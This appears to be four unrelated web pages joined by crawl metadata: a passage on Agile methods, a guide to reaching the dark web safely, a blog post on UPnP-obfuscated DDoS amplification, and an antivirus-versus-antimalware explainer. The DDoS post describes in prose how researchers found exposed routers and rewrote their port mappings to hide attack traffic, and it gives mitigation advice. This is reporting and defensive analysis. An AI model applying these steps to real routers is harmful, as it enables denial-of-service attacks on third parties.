- Attention to technical detail and design enhances agility – The right skills and good design ensures the development can maintain the pace, constantly improve the product, and sustain change.
- Simplicity – Develop just enough to get the job done right now helps maintain interest and understanding.
- Self-organizing teams encourage great architectures, requirements, and designs – Skilled and motivated team members who have decision-making power, take ownership, communicate regularly with other team members, and share ideas that deliver quality products.
- Regular reflections on how to become more effective – Self-improvement, process improvement, advancing skills, and techniques help team members to work more efficiently.
Agile development is one where requirements are discovered, and solutions are developed by self-organizing and cross-functional teams, using collaboration with end-users, adaptive planning, evolutionary development, early delivery, and continual improvement, and where the development cycle encourages flexible responses to change.
If a methodology has any of these aspects missing, then it is not a truly Agile model.
The detail of what is Agile software development is process specific and what is specific to an Agile development methodology can and will vary between organizations.
That is one of the most powerful aspects of Agile development. The Agile development process detail for any Agile product development can be tailored to suit the characteristics of the organization, the capability of the development teams, and the software development cycle while still following the Manifesto principles.
These provide a great Agile overview that is still as valid today as when it was first published nearly 20 years ago.
There are a number of different Agile development practices, each depending on the specific application of the 12 principles. These can have slightly different software development cycles.
For example, a scrum software development cycle will have fixed iterations, whereas these do not exist in a Kanban development process.
However, common to what is an Agile development methodology is the regular delivery of products in short timescales, produced without excessive documentation.
The features of a scrum software development cycle are:
- The developers are organized into one or more small ‘scrum’ teams
- There is a product owner for each scrum team, who represents the voice of the customer and the products stakeholder to the team. They define the requirements as a set of ‘user stories’
- A scrum master acts as a buffer between the teams and any distracting influences, and facilitates the development process
- Work to be done is held as user stories in a product backlog
- The product owner decides on the priorities of the user stories
- The development team take prioritised user stories and carry out all the necessary tasks to deliver working software
- The working software is delivered in a series of incremental sprints
- Sprints have a fixed duration of between and 4 weeks
- The sprint starts with a sprint planning event that agrees the goal for the sprint and which backlog items will be tackled
- A daily scrum is held with all team members to review progress and agree how to address any impediments to delivery
- At the end of each sprint, a sprint review and sprint retrospective shows progress to stakeholders and identifies any lessons and improvements for subsequent sprints
- Only working software is output from the sprints
Kanban is a system for workflow and process management that provides visual signals to communicate information to improve efficiency and effectiveness.
Kanban is used in many sectors, including manufacturing, process improvement, software development, project management, program management, and IT Service Management (ITSM).
Kanban is particularly used in Lean systems, as it provides a simple and understandable way to identify waste, especially bottlenecks between the different steps in an end-to-end process.
The principles of Kanban are very much aligned to the principles included in the Manifesto and Twelve Principles:
- Kanban visualizes the workflow so that it is easy to understand
- Kanban encourages acts of leadership at all levels
- Kanban helps to measure and improve collaboration
- Kanban encourages respect for the process, roles & responsibilities
- Kanban helps the team to make the process explicit and easy to understand
The term word Kanban is Japanese for ‘signboard.’ In many implementations of Kanban, the term is also used to describe a board that is used as a visual system to display tasks, their status, and their progress towards completion.
This Kanban Board uses different columns and colors to differentiate between different types of task and their status. This is the most commonly used form of Kanban.
This Kanban Board plays a vital role in displaying the workflow of tasks. It helps to achieve the 12 principles by optimizing the flow of task between different teams and between different stages.
Kanban Boards are a useful method for defining, managing, and improving services. By displaying work items visually on the Kanban Board, team members can see the state of every piece of work at every development stage and get a common understanding.
Moreover, a team member gets an overview of who is doing what so that they can identify and eliminate problem areas in the product development process.
The Kanban methodology allows work to be prioritized according to the needs of the customers. As work moves from one state to another, extra work can also be added from the backlog to maintain a steady flow of work through the system.
The development team members collaborate with each other to improve the flow of work throughout the project.
Kanban boards are commonly used in conjunction with the Scrum approach to display progress and support discussions at the daily sprint meetings.
However, Kanban as an approach differs from Scrum, as the process is never restricted to a set process or a defined sprint backlog. Kanban is more able than Scrum to maintain flexibility.
History of Agile
The history of Agile development goes back to the 1990s when new approaches such as Extreme Programming were developed to address frustrations with the long timescales and poor quality of the software development cycle.
Before the advent of Agile development practices and the start of the history of Agile, the final product of many inflexible software development cycles often did not meet the user’s needs.
Thought leaders in the practices wanted to address these issues by defining what is Agile.
In early 2000 a group got together to develop a new approach, which laid the foundation for the Agile development process.
They published a number of articles that referenced new “lightweight” processes for the software development lifecycle.
In February 2001, the history of Agile really started with the publication of the Agile Manifesto for Software Development and the Twelve Principles of Agile Software. These were the foundation for all Agile development models.
This codification of what was a methodology for Agile development provided an alternative to the documentation driven and cumbersome software development cycles of the time.
This definition was easy to understand. This helped its adoption by many who created their own Agile development process.
Using an Agile development cycle first took hold in small start-up companies but soon spread wider.
Agile development process thinking has continued to be developed and innovated throughout its history, resulting in a number of different Agile development models.
Each of these Agile development practices focus on the customer.
Throughout the history of Agile, these practices have promoted new organizational models for the software development cycle.
The concepts in the definition of what is Agile demonstrated the value of delivering good products to customers by recognizing that people are the most important asset.
History demonstrates that following Agile development model values will always fuel interest, adoption, and development of Agile development practices.
Future of Agile
The Agile Manifesto principles are just as valid today for the future of Agile as when they were first published nearly 20 years ago.
The pace of today’s technology change, the ever-increasing expectations of business and consumers, and the globalization of supply chains require Agile methodologies for almost every aspect of life, not just Agile software development.
The future of Agile will be just as vibrant and valuable as the history of Agile.
Over recent years new Agile methodology steps have emerged to cope with the required pace of delivery and specific applications such as Agile project management.
These new steps still align with the Agile manifesto principles and hence are still recognizable as being Agile.
Agile Scrum has become less attractive to many organizations, particularly those whose existence depends on making rapid changes to consumer-facing products.
The fixed delivery cycles of Scrum create issues; hence this approach will feature less and less in the future of Agile.
Agile methodologies such as Kanban and Continuous Delivery overcome the limitations of Scrum, and the future of Agile will continue to see Agile methodologies enhanced with new ideas.
We are also likely to see new Agile methodologies in the future of Agile, as organizations discover new ways to interpret the manifesto principles and develop new Agile frameworks.
One expected area of growth in the future is Agile project management. Before the advent of Agile frameworks for Agile project management, project management practices shared the same issues that led to the development of the Agile manifesto principles, with projects overrunning both timescales and budgets.
In the recent history of Agile, Agile project management methodologies emerged and have started to be widely adopted as the project management community recognized the value of Agile management.
As the use of Agile project management increases, it is highly likely in the future of Agile that these Agile frameworks will evolve as organizations learn and innovate.
In the future of Agile, Agile methodology steps for developing software may also change as new technologies emerge, particularly with the continued growth of remote collaboration tools and the use of enterprise software.
There will also be new steps created for when the Agile framework is used outside software. For example, the human resources discipline has started to apply the Agile Manifesto values for activities such as recruitment.
As the future of Agile sees Agile management techniques extended across every part of an organization, the methodology steps will be amended to suit the particular characteristics.
Twenty years ago, at the start of the history, the use of the Agile framework was restricted to very few early adopters.
Today and for the foreseeable future of Agile, Agile methodologies and Agile frameworks are a fundamental tool for many different disciplines and organizations.
Agile Pros and Cons
Whilst the values and principles of Agile can be applied to a very wide variety of circumstances and situations, Agile pros and cons are many, and there will be some organizations where the Agile cons outweigh the pros.
Despite the proven benefits of this flexible methodology, it cannot be applicable for everyone in every circumstance.
One of the challenges is that it requires everyone to buy into the methodology, not just the software development team.
A commonly seen problem is that management have a deep-seated desire to be in control of everything, which is completely at odds with the principle of self-determining teams.
For Agile to be truly effective, every part of the organization and every individual in it must understand and embrace the principles and values. For some organizations that is too much to ask.
The whole organization needs to change its culture from being authoritative and hierarchical to the open, trusted, empowered culture inherent in Agile thinking.
In theory anyone can make the necessary transition, provided that they have the desire and determination to understand the principles and values and then make the necessary changes to their attitude, behavior and culture.
However, not everybody is built the same. There can be barriers at both individual and organizational levels to embracing what Agile has to offer.
Here are some of the potential barriers to adoption.
- It requires a culture that is open and built on trust, and the giving of feedback, both within and outside the team. This can be a major challenge for some organizations. This is particularly the case for those with an entrenched hierarchical management structure, where management always direct and routinely check the work of their subordinates, and are not used to getting feedback.
- It needs a change in mindset so that you only work on one thing at a time, and deliver that one thing. Only then can you move on to what the next work item is. Teams are given just enough work that they can complete a single iteration. This powerful concept helps to avoid teams becoming overloaded. This can be a challenge to organizations that expect every project to show some progress every period.
- It promotes different organizational structures. If you want to increase the rate of delivery from your team, you can’t just add more individuals into it. One of the developments in the organization of software development teams has been the introduction of the ‘two pizza’ concept. This is where the team should be of a size where the team members can eat two pizzas at one sitting. This concept results in a team size of 5-7 people, which co-incidentally is a very similar size to the smallest organizational unit in armies for over a thousand years! A downside of this approach is that if you want to get more throughput you have to stand up a new team. Hence it may not be the best option for organizations where the required rate of production changes.
- It expects teams to be self-sufficient and self-determining. Hence adoption of the methodology typically results in the loss of traditional management roles. The organization needs to be prepared for this, and either re-deploy managers that are no longer necessary or dispose of them.
Before you start adoption, it is important that you consider the Agile pros and cons. These can vary depending on which particular approach you look at, for example, Agile vs Waterfall vs Scrum.
To understand the difference between Agile and Waterfall it can be helpful to build an Agile vs waterfall comparison table.
Some key differences concerning Waterfall vs Agile are:
- Waterfall is a strictly formalized and linear approach to software development, whereas Agile pros include its flexibility.
- Waterfall starts with the development of a hierarchy of fixed requirements, unlike Agile, where the requirements are encouraged to change over time. This is an important difference of Agile vs waterfall methodology and a key element of Agile pros and cons.
- Waterfall defines user requirements in considerable detail, whereas Agile captures them as simple ‘user stories,’ in the form of ‘I would like to be able to ….’. This is an important differentiator between Agile vs Waterfall, as it is more likely to give users what they want.
- In Waterfall, the detailed design and documentation is done before any coding is attempted, in Agile coding starts with just the user stories, and the design evolves over time. This is a good example of where Agile pros and cons derive from the same feature; as for safety-critical products, the design might have to be detailed upfront.
It isn’t feasible to have an Agile and Waterfall model, with both in the same methodology, as they are in such great contrast to each other.
Considering the Waterfall vs Agile methodology, Waterfall is today only appropriate for large scale projects with outsourced coding, where the requirements are not going to change between design and delivery.
In the next section, we will consider this with reference to Agile vs waterfall project management.
The most important thing to consider before you consider implementation is your ability and desire to transform the culture across your whole organization.
Adoption requires open minds that are prepared for change. This aspect of Agile can frighten the types of individuals who expect certainty in everything.
It also requires collaborative team working, where every team member supports their colleagues; there are no ‘bosses,’ and lessons are learned after issues rather than blame being apportioned.
This can be a major change for an organization that has been used to autocratic and hierarchical management, using task-oriented instructions.
Any implementation must, therefore, be supported by an aligned organizational change management (OCM) initiative.
The OCM activities can and should themselves be done in a flexible and incremental way, recognizing that every organization and every individual are different and that there is no single prescribed approach to get to a culture that is suitable for Agile working.
Agile requires customers to work as part of the delivery teams, with frequent and early opportunities to see the work being delivered, so that they are part of the process to make decisions and changes throughout the development project.
These customers need to be prepared for this involvement, as some customers might not have the time or interest necessary for successful delivery.
It also requires all team members’ full dedication to the collaborative culture, working together towards a common goal.
Before starting the transition to these new ways of working, you should consider the capability of your individual team members to work in this way.
There is a risk that some might not want to work in these new ways, as they are more comfortable with fixed approaches.
It would be best if you worked out what you can do with these individuals. Education and training in the new concepts is one approach, but if that fails, you may need to re-deploy staff.
You will need to review the different approaches and methodologies available and decide which is best for you.
This selection should be made carefully; otherwise, your investment may be wasted if you make an inappropriate choice.
Hence you need to budget for and plan for up-front education of key individuals on the wide variety of lean approaches.
Whilst you may get some help from external consultants, selecting the best approach requires knowledge of your organization, products, values, and existing culture, as well as knowledge of what is Agile.
When making the selection of the most appropriate approach, you must look beyond the jargon and product marketing.
New transformational approaches like this do not come in a shrink-wrapped box, with regular updates.
Agile is a concept that can be of immense value to your organization, but the transformation will require a lot of dedication and hard work.
You should view your implementation as a new adventure. You are likely to have challenges in the initial stages, which you may need help with to fix, but ultimately moving to Agile can only be done by your own staff.
This will require open minds, flexibility, and above all, a focus on the customer. Trying to stick to a fixed timetable for implementation is likely to lead to failure.
Have someone in your organization that is an evangelist for what is Agile. They should be prepared to lead the transformation but be a good listener too.
Following the Agile principle of asking for feedback, and acting on it, is fundamental to a successful implementation.
What is Agile Management
Agile management in action varies in detail between which Agile methodology is being used.
For example, in Agile scrum project management, the project manager has management responsibilities, just the same as in waterfall project management.
In scrum project management, the scrum master has no role to play in managing the project. The scrum master role in the Scrum framework is to protect the team from outside influence and to act as a facilitator but not a manager for the scrum process.
Agile project management tools sometimes have challenges encapsulating what is Agile management for projects, especially as for scrum project management; all team members have a role to play in managing the project.
This creates challenges in any Agile project management tools that expect roles to be restricted to single individuals, which is contrary to what is Agile management theory.
What is Agile Project Management
The Agile project management process applies Agile principles to the discipline of project management.
In an Agile project management methodology, projects are delivered using short sprints.
This Agile approach to project management encourages projects to proceed at pace, as it provides a short time focus on the next deliverable.
This avoids the situation with non Agile management practices when there are often long timescales between the start of a project stage and the delivery of its products.
Also, in a non Agile project methodology, the deliverables have to be determined in detail at the start of the project, which make them inflexible to change.
By using the Agile methodology project management can avoid this issue, as the deliverables are defined at the start of each short sprint.
Hence the Agile methodology in project management is more likely to deliver what the user wants.
What are the Agile management processes will be different for each project Agile methodology, depending on factors such as the required level of project governance, the type of products being delivered, and the fit of the 12 principles to the specific situation.
A good way to understand what is Agile project management is to contrast it with how project management used to be done.
PRINCE2 is one of the world’s most widely-recognized project management methodologies.
Before the advent of the new approaches, it was one of the world’s most widely used approaches for managing projects, using a waterfall approach that delivered all the products at the end of the final stage.
PRINCE2 and other similar waterfall project management methodologies use a predictive and plan-based approach, requiring detailed planning upfront to determine the required products and delivery timescales.
In contrast, an Agile process for project management brings many short-term, incremental achievements without the need for an up-front detailed definition.
This adaptive approach is a key feature of any Agile management style for managing projects.
This means that whilst a non-Agile project management methodology such as PRINCE2 essentially steers the customer to remain focused on the project’s original business goals, Agile project management processes are very responsive to changes in the project environment and customer requirements.
Today, Agile project management with Scrum is the most commonly used application of the Agile project management principles and is supported by a number of Agile project management software tools.
As what is Agile project management becomes more widely used, it is probable that it will have the same experiences as other applications of the 12 principles, with modifications and enhancements of the project management process being made to get away from the fixed time sprint limitations of using Scrum.
What Is a Waterfall Approach?
The Waterfall approach is much older than Agile and has been traditionally used for large scale software developments for many years.
They have contrasting cultures, so cannot be used together. Waterfall is a strictly formalized and linear approach to software development.
Waterfall starts with the development of a hierarchy of fixed requirements; change after development is discouraged.
The highest level of requirements in Waterfall is user requirements, which are described in a great deal of detail in a formalized manner, not as simple ‘user stories,’ in the form of ‘I would like to be able to ….’.
Each successive level of requirements in Waterfall then goes into the design of more and more detail; the purpose is to define a design for every specialist group involved in each stage of the development and testing.
These include usability designs, technical designs, user acceptance test definitions, test plans, and program specifications.
The design does not evolve over time in Waterfall, it is fixed at the end of the design stage.
All succeeding stages in Waterfall use this design as the baseline for their activities, presuming that the design is still valid. This is often not the case,
This is a typical sequence of events in a waterfall approach to product development:
- Gather requirements for the complete product.
- Document requirements.
- Sign off requirements.
- Complete designs.
- Sign off designs.
- Code and unit test against requirements.
- Perform system testing against requirements.
- Perform integration testing.
- Perform usability testing.
- Perform user acceptance testing (UAT) against requirements.
- Prioritize any defects discovered.
- Fix any high priority issues..
- Create release documentation, including a description of the outstanding defects and any functionality that hasn’t been delivered
- Deliver the finished product.
In a true waterfall development project, each of these represents a distinct stage of software development, and each stage has to complete and be signed off before the next one can begin.
There is also typically a stage gate between each; for example, requirements must be reviewed and approved by the customer before design can begin.
In contrast, the sequence of events in Agile can be summarized like this:
- Gather requirements as succinct, discrete user stories, and store in the product backlog.
- Select enough items from the product backlog that can be completed in one increment.
- Code and test in parallel.
- Deliver the product increment.
- Go back to step 2.
One of the greatest challenges with Waterfall is that it is difficult to capture a complete and comprehensive set of requirements and detailed designs.
Frequently, users don’t’ always really know what they want until they can see it. Customers are not always able to visualize an application from a requirements document.
This often means that customers are dissatisfied with products delivered using a waterfall approach.
Agile methodologies have transformed how work is done today in a wide range of sectors and industries.
Organizations all over the globe have seen the benefits from valuing individuals and interactions over processes and tools, working products over comprehensive documentation, customer collaboration over contract negotiation, and responding to change over following a plan.
The great ideas that were initially confined to software development have now been taken up by areas that were unthinkable back at the inception in 2001.
Time has taken the application of the principles set out in the Manifesto from niche specialists to workers at all levels.
Which particular methodology is best for you and your organization is dependent on your own circumstances and needs, but you can be assured that there is something that will work for you and your customers, both for now and for the foreseeable future. | <urn:uuid:b938fa2d-b715-4cc1-b96a-1a1a73fde82b> | CC-MAIN-2024-38 | https://itchronicles.com/agile/what-is-agile/ | 2024-09-19T18:30:49Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700652055.62/warc/CC-MAIN-20240919162032-20240919192032-00377.warc.gz | en | 0.948893 | 6,853 | 3.015625 | 3 |
August 22, 2024
9 minute read
The internet is almost unfathomably large, and most of us are only actively engaging with between 4-5% of it. This is known as the surface web. The other 95-96% of the internet exists between what is called the “deep web” and “dark web.” This article will teach you the difference between the surface web, dark web, and deep web, and how to access the dark web safely.
When accessing the dark web, safety needs to be a top priority. There are a lot of dangers lurking in the corners of the dark web as it’s a well trafficked playground for cybercriminals and is riddled with criminal markets that span the imagination.
To say the least, DOT Security does not recommend going to the dark web unless absolutely necessary. However, if you’re going to venture into the dark web, you’ll need to be well–prepared, so keep reading to keep safe.
Cybercrime is getting more sophisticated, putting businesses at a serious disadvantage when it comes to protecting their networks. Discover how your current security strategies compare to industry best practices with DOT Security’s Cybersecurity Checklist: How Covered Is Your Business?
The internet has three layers. The surface web, the deep web, and the dark web. The surface web is what the average daily internet user interacts with the most. Search engine results from Google, Bing, and Yahoo, public websites, social media, and anything else that’s indexed and publicly available is considered a part of the surface web.
Although the surface web only comprises about 4-5% of the entire internet, scope is important to keep in mind because this is still impressively expansive. Take YouTube for instance; it would take over 17,800 years to watch every single YouTube video in existence, and that’s just YouTube. That’s just a fraction of the surface web.
While there are some threats on the surface web, and users need to browse with some level of security awareness, it’s a lot easier to stay safe on the surface web than the dark web.
The deep web is in between the surface web and the dark web, and it constitutes the large majority of the actual internet. The deep web makes up approximately 90-91% of the internet. Similar to the surface web, users don’t need any special software to access the deep web, and it’s a relatively quiet landscape in terms of cyberthreats.
The difference between the surface web and the deep web is that pages, websites, and content on the deep web are only accessible to authorized users with the appropriate credentials. In other words, these are pages that aren’t indexed and therefore can’t be found by a typical search engine.
Think about your email threads, for instance. It would be problematic if someone could open your private email chains through a simple Google search. An easy way to think about this is if you need a username and password to access it, it’s a part of the deep web.
Other examples of deep web content are academic journals, government resources, medical records, bank statements, subscription information, private social media content (like private messages), and other content that is accessible only to authorized users who provide the proper credentials.
The surface web and the deep web make up between 94-95% of the entire internet. The last 5-6%, however, constitute the dark web. Originally used by the United States Department of Defense for anonymous communication, the dark web is now a place for those wishing to stay anonymous themselves.
While there is a lot of criminal activity on the dark web, there’s nothing actually illegal about accessing the dark web. In certain countries, the dark web facilitates political discourse and conversation that would otherwise be censored, outlawed, or eradicated in entirety.
That being said, the anonymity offered by the dark web is the perfect breeding ground for criminals from all walks of life and users are advised to browse with extreme caution. Again, it’s DOT Security’s advice to stay off the dark web entirely.
As mentioned throughout, DOT Security advises against accessing the dark web as it opens up a myriad of vulnerabilities that are unnecessary for the vast majority of businesses and organizations.
However, there are a handful of exceptions to this rule. For instance, there are some organizations who employ the services of white-hat-hackers for a number of reasons. Often, these ethical hackers use their computer savvy to help governments agencies and big corporations hunt down vulnerabilities and in turn, create patches defenses for those system weaknesses.
This process, though, can often involve accessing the dark web for research into the most current malware on the market.
Additionally, there are non-profit organizations like the Global Emancipation Network (GEN) who employ world-class tech-professionals who are using their skills to combat human-trafficking on a global scale. These efforts could very well include accessing the dark web to help victims and hunt down criminals.
Accessing the dark web requires more than just a standard web browser. Before downloading your dark web browser, though, there are a series of safety precautions you’re going to want to take first.
The steps to access the dark web safely are as follows:
Let’s break each of these down a little bit further.
The first rule for accessing the dark web is to go into it with a purpose or a defined goal. This will help you navigate the dark web safely while staying out of markets you don’t want to come across or engage with.
The dark web is full of malicious actors, cybercriminals, and other people who are looking to prey on curious but unprepared dark web browsers. By defining your goal and purpose, you won’t find yourself wandering down the dimly lit corners of the dark web, and you can stay on the path you set out for yourself.
Now when it comes to the technical safety precautions that users should take when accessing the dark web, choosing and deploying a VPN is a critical first step.
VPN stands for virtual private network, and it acts as a security bubble for communications from your device. A VPN automatically encrypts your data as soon as it leaves your device through the VPN server. This means your private information, location, and any communications you send are hidden and protected.
Because VPNs offer users anonymity and mask their actual location, they’re also effective tools for accessing geo-locked services.
There are both free and paid VPN services, but if you’re planning on accessing the dark web, you’re going to want to opt for a high-quality paid VPN that offers you plenty of protection.
Once you’ve chosen a VPN provider and have successfully set up your account, you’re ready to start looking at overlay networks.
Before you go much further, it’s important that you close out of other applications and software that offer malicious users on the dark web an entry point into your device or network. When closing down other applications it’s important to actually right-click and quit rather than just hitting the x in the corner of the window.
This is an extra precaution that can protect your device from savvy hackers looking for any opening that presents itself.
With your VPN up and running and all of your other apps closed down, you’re finally on the brink of actually accessing the dark web. To access the surface web or the deep web, all you need is a standard internet browser like Google Chrome or Safari. For the dark web, though, you need an entirely different entry point known as an overlay network.
There are a huge number of overlay networks to choose from, but some of the most popular include Tor, Freenet, and Riffle. You’ll need an overlay network to facilitate your dark web access. You can also increase the level of safety in the overlay network settings itself, which in turn disable certain website functionality.
Securing a VPN and choosing your overlay network has you in the final stretch for accessing the dark web safely. The final step before you can start browsing with relative peace of mind is to conduct an IP leak check.
This essentially just makes certain that your VPN is working and that your personal IP address isn’t exposed for malicious actors prowling the dark web. To conduct this check, just turn on your VPN and head over to ipleak.net and dnsleaktest.com to see if the IP address displayed is the one from your VPN.
If it is, you're good to go and can start surfing the dark web.
The last thing you need to do to access the dark web is find links for sites hosted there. Unlike the surface web, you won’t be able to find dark web sites through a search engine. Rather, you’ll need to visit dark web aggregators that share links to various pages, or wikis where users can add dark web links manually.
From there, as you navigate through the dark web, it’s up to you to stay on the path you’ve laid out for yourself, avoid criminal market places, and to keep any personal information close to your chest.
Staying off the dark web, if possible, is crucial for several reasons, primarily due to the inherent risks and illegal activities that dominate this hidden part of the internet. The dark web is notorious for hosting marketplaces that deal in illegal goods and services, such as drugs, weapons, counterfeit money, stolen data, and even human trafficking.
Engaging with these sites, even inadvertently, can expose individuals to serious legal consequences, including criminal charges. Law enforcement agencies worldwide monitor the dark web, and accessing these illicit markets, even out of curiosity, can draw unwanted attention and legal scrutiny.
Moreover, the dark web is rife with cybersecurity threats. The anonymity that the dark web provides attracts criminals, hackers, and malicious entities. Visiting dark web sites can expose users to malware, ransomware, and phishing attacks, putting personal and financial information at severe risk.
The utter lack of regulation and the prevalence of sophisticated cybercriminals make it easy for users to fall victim to scams or data breaches on the dark web, ultimately underscoring the importance of avoiding the dark web altogether.
The dark web is made up of a variety of different overlay networks and accounts for somewhere between 5-6% of the overall internet. It allows users to buy and sell, browse, and communicate with nearly complete anonymity.
This makes it really appealing for those who want to avoid unnecessary surveillance or who need to communicate without fear of oppression or governmental retaliation. However, if you’re planning to spend any time exploring the dark web, it’s crucial you take the necessary precautions to keep your device, your data, and yourself safe.
Keeping your company network safe requires a dedicated strategy that makes use of multiple defense measures for a comprehensive cybersecurity strategy. Learn how your current cybersecurity measures live up to industry best practices with DOT Security’s Cybersecurity Checklist: How Covered Is Your Business? | <urn:uuid:e476860f-2cba-4211-a950-637f69358cd0> | CC-MAIN-2024-38 | https://dotsecurity.com/insights/how-to-access-the-dark-web-safely | 2024-09-20T23:17:20Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725701425385.95/warc/CC-MAIN-20240920222945-20240921012945-00277.warc.gz | en | 0.92576 | 2,304 | 2.9375 | 3 |
Distributed Denial of Service (DDoS) attacks are a huge cybersecurity problem. And they’re only getting worse. According to Neustar’s May 2017 Worldwide DDoS Attacks & Cyber Insights Research Report, 84% of the 1,010 organizations surveyed suffered at least one significant DDoS attack in the past twelve months, up from 73% in 2016.
86% of the surveyed organizations reported multiple DDoS attacks in that time period. Compared to 2016, in the 2017 report there were twice as many DDoS attacks that used more than 50 Gbps of data. Chances are 2018 will be even worse.
Now, there’s news of a new type of DDoS attack. This attack method is designed to evade DDoS mitigation measures, making it a stealthier way to bring down targeted networks.
UPnP DDoS Attacks
Security researchers at Imperva have discovered a sneaky new way to perform a DDoS attack. They caught cyber attackers using it in the wild, and they’ve been able to replicate the attack themselves.
The Universal Plug and Play (UPnP) protocol is designed to facilitate device discovery over a network using UDP port 1900, and then can use a TCP port for device control. UPnP is often used within LANs so that routers, printers, and client machines can discover each other and communicate. When implemented properly, this can make a network administrator’s job easier.
Unfortunately, UPnP has a number of well known vulnerabilities. Default settings can leave UPnP open to external cyber attackers because the protocol lacks an authentication mechanism. There are also lots of remote code execution vulnerabilities which are specific to UPnP.
DDoS attacks in general are often mitigated by identifying particular source ports and blocking their traffic. But with the way that UPnP is designed, cyber attackers can easily mask the source port they’re exploiting. UPnP is made to forward Internet connections to a LAN by mapping IP port connections to local IP port services. Routers should only allow internal port connections to go through UPnP, but few routers properly verify that they are internal. That vulnerability can be exploited by cyber attackers to route their external connections to their targeted LAN. If the attacker is able to poison the port mapping table, they can exploit the router as a proxy.
Using that exploit to mask their source port, cyber attackers can proceed to execute an amplification DDoS attack.
Typical amplification DDoS attacks use the source port of the port which amplifies the attack. So by blocking specific ports, those attacks can usually be mitigated. Obviously, that doesn’t apply to amplification DDoS attacks which exploit UPnP.
UPnP DDoS Attacks in Practice
Imperva mitigated what was probably the first UPnP DDoS attack they discovered on April 11, 2018. They observed an SSDP (Simple Service Discovery Protocol) amplification assault. Some of the SSDP payloads came from an unexpected source port instead of UDP port 1900. Imperva researchers were perplexed by what they saw. To help discover what was going on, they eventually created a proof of concept that uses UPnP to obfuscate the source port of a DDoS amplification attack. Eureka!
The first step in creating the proof of concept was using the Shodan search engine to find an exploitable UPnP router. Those devices often have a “rootDesc.xml” file, so that’s how the search was queried.
Once they found an exploitable UPnP router, they accessed the XML file through HTTP by changing the file’s location IP address.
The next step involved editing the “rootDesc.xml” file to modify the port forwarding rules. The rules need to be modified in such a way to allow an attacker to route external IP connections to internal IPs. That step takes advantage of how most routers don’t properly verify that stated internal IPs are actually internal. Oops!
To set the stage for an amplification DDoS attack which exploits UPnP for obfuscation, the following steps had to be taken:
- A DNS request was sent to the targeted UPnP router through UDP port 1337.
- Thanks to the new port forwarding rules, the request was sent to a DNS resolver over destination port UDP 53.
- The resolver responded to the device through source port UDP 53.
- Then the source port was changed to UDP port 1337, and the targeted UPnP router forwarded the DNS response to the source of the request.
With all of that taken care of, an amplification DDoS attack can then be executed and most DDoS mitigation methods wouldn’t be able to stop it. The same method demonstrated in Imperva’s proof of concept can be used with NTP and SSDP attacks instead of DNS. Memcached DDoS attacks could use the new UPnP obfuscation method as well.
Mitigating This Attack Method
So how can this new DDoS attack method be mitigated? According to Imperva:
“With source IP and port information no longer serving as reliable filtering factors, the most likely answer is to perform deep packet inspection (DPI) to identify amplification payloads—a more resource-intensive process, which is challenging to perform at an inline rate without access to dedicated mitigation equipment.”
Did the DDoS attack that Imperva mitigated on April 11 actually exploit UPnP for port obfuscation?
“It should be noted that we also considered alternative hypotheses for the attack that prompted our investigation. For instance, that the occurrence in question could have been explained by an internal network setup or a purposeful forwarding configuration, which unintentionally resulted in port obfuscation.”
But another DDoS amplification attack which Imperva researchers mitigated on April 26 supported their original hypothesis as was demonstrated in their proof of concept. The April 26 attack was executed through an NTP amplification vector. Some of the payloads originated from a source port which wasn’t the usual UDP port 123. That attack behaved just like their proof of concept, substituting DNS for NTP.
So if UPnP obfuscation is used more frequently by cyber attackers to execute amplification DDoS attacks which evade usual DDoS mitigation measures, more routers are going to have to implement deep packet inspection. It may be more resource-intensive, but it may be absolutely necessary as DDoS attacks evolve. | <urn:uuid:13d30b4f-dbc7-41e2-be58-36abe863102b> | CC-MAIN-2024-38 | https://blogs.blackberry.com/en/2018/06/theres-a-new-type-of-ddos-attack-in-town | 2024-09-07T13:58:10Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700650883.10/warc/CC-MAIN-20240907131200-20240907161200-00577.warc.gz | en | 0.945446 | 1,333 | 2.578125 | 3 |
A lot of jargon is thrown around when it comes to protecting your computer and devices, including antivirus and anti-malware. It begins to get confusing as to which you should be using and whether they are actually that different from one another. Here is what you need to know.
What is Antivirus Software?
Antivirus software is designed to protect against, detect, and remove viruses that have been downloaded on your computer. A virus is a code that has been placed on your computer in an effort to do malicious deeds against you by adding, deleting, or changing files that are on your computer.
The point of a virus is destruction and general frustration.
A virus is not going to take anything from your computer or device, but will attempt to ruin your device or items on it.
What is Antimalware Software?
Antimalware software performs much in the same way that antivirus software does, in that its purpose is to protect against, detect, and remove any malware that has been downloaded onto your computer or your device. There is a difference between malware and viruses, however. A virus, while destructive, is not as dangerous to you as malware is.
Malware includes things like Trojans, phishing, rootkits, and sometimes viruses as well. Malware has many forms and many ways to do harm against you or your computer, including destroying things on your device or removing things from your device in an effort to steal your information or hold items ransom in order to receive a monetary compensation from you. Antimalware software is designed to defend you against malware so nothing like that happens to you or your computer or any other device.
The Real Differences between Antivirus and Antimalware
There are some differences when you are looking to purchase antivirus and antimalware software. A common misconception is that antivirus software can protect against malware and that antimalware can protect against viruses, but really this is not always the case and it could open you up to attacks by taking for granted that one type or the other is going to keep you safe from everything. The situation gets murkier when you have software that calls itself antivirus when it really behaves as antimalware.
Viruses really had their peak in the 1990s and while they still exist in today’s world, they are the minority of things that can actually hurt your devices. Different forms of malware are more dangerous and destructive than a standard virus. But the bottom line is that some antimalware protects against viruses.
Which Type of Protection you Need
When you are shopping for a reliable kind of antivirus or antimalware software, the first thing that you need to look at is how thorough the protection that software is offering actually is. Software like Avast, which is an antivirus software, does offer protection from some forms of malware as well. Then you have McAfee, which is an antimalware company, and offers protection from malware, which they say also includes viruses. When you are trying to determine what you would like to use, you need to read what specific kinds of malware are included to make sure you are getting the most thorough protection possible. It is also important to note that some types of protection that are free or inexpensive do not protect you in every way possible and the more money you spend to upgrade the protection, the more protection they will offer.
What to Look for in Protection
There are a few things that you can look for when you are shopping for protection in order to help you decide what is right for your specific needs. These are the features that you should be looking at.
- Scanning: This means virus and malware scanning, so it will always be running in the background of anything you are using in order to watch for anything that could be harmful. Most of the antivirus and antimalware software will offer a real-time scanning feature to nip malicious software before it has downloaded or caused any harm.
- Prevents script files: Another thing the software should do is block any malicious script files before they start to run.
- Heuristic analysis: This is a method that will look out for viruses or malware that are not commonly known about yet. Antimalware software tries to stay as current as possible and keep up with cybercriminals, but of course it is hard to protect against new types of malware that have not been discovered. So having an analysis available that will still prevent against things that could be threats could also save you a lot of headache.
